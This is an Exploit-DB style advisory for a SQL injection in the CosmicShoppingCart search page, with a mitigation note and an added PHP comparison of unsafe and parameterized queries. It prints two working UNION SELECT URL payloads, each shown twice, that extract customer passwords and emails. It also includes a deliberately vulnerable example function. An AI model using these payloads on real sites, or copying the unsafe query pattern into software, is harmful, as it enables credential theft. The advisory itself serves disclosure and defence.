Vendor: CosmicShoppingCart
By: Vympel (Marcelo Almeida)
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: CosmicShoppingCart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:cosmicphp:cosmicshoppingcart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

CosmicShoppingCart SQL Injection Vulnerability

SQL injections have been found in CosmicShoppingCart, a PHP/MySQL e-commerce system. These injections could be exploited by users to retrieve the passwords of the admin. Examples of the injections are:

cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.
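The two payloads above only work because the value of the `max` request parameter is inserted verbatim into the SQL text. The following is an added example, not CosmicShoppingCart's own code: the page does not show the real query behind cosmicshop/search.php, so the handler, table and column names below are hypothetical, and the snippet only contrasts the assumed unsafe pattern with a validated, parameterized version.

```php
<?php
// Added example, not CosmicShoppingCart's own code. The real query behind
// cosmicshop/search.php is not shown on this page; this hypothetical handler
// only reproduces the pattern the payloads imply: the "max" request parameter
// is spliced into the SQL text. Table and column names are made up.

// Vulnerable pattern (assumed): string concatenation of an untrusted value.
// A request such as max=-1 UNION SELECT ... FROM custs/* is then parsed by
// MySQL as part of the statement, which is how the custs table contents leak.
function search_unsafe(PDO $db, array $get): array
{
    $sql = "SELECT prod_name, prod_price FROM products WHERE active = 1"
         . " LIMIT " . $get['max'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: validate type and range first, then bind the value as a
// typed parameter so it can never become SQL syntax.
function search_safe(PDO $db, array $get): array
{
    // 1. Validate: "max" must be an integer between 1 and 100. Anything else
    //    ("-1 UNION ...", "'2' UNION ...", trailing /* or -- comment
    //    sequences) is rejected before it reaches the database layer.
    $max = filter_var($get['max'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($max === false) {
        http_response_code(400);
        return [];
    }

    // 2. Parameterize. PDO::PARAM_INT matters for LIMIT: with emulated
    //    prepares, a default string binding would be quoted as '20', which
    //    MySQL rejects in a LIMIT clause.
    $stmt = $db->prepare(
        "SELECT prod_name, prod_price FROM products WHERE active = 1 LIMIT :max"
    );
    $stmt->bindValue(':max', $max, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (hypothetical): $db is a PDO connection with emulated prepares
// disabled, so statements are prepared server-side.
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
// $rows = search_safe($db, $_GET);
```

Validation alone is not the fix; the prepared statement is what keeps the value out of the query text, and the range check is defense in depth.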

Exploit-DB raw data:

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable shopping cart designed.

SQL injections have been found; they could be exploited by users to retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

# milw0rm.com [2006-05-28]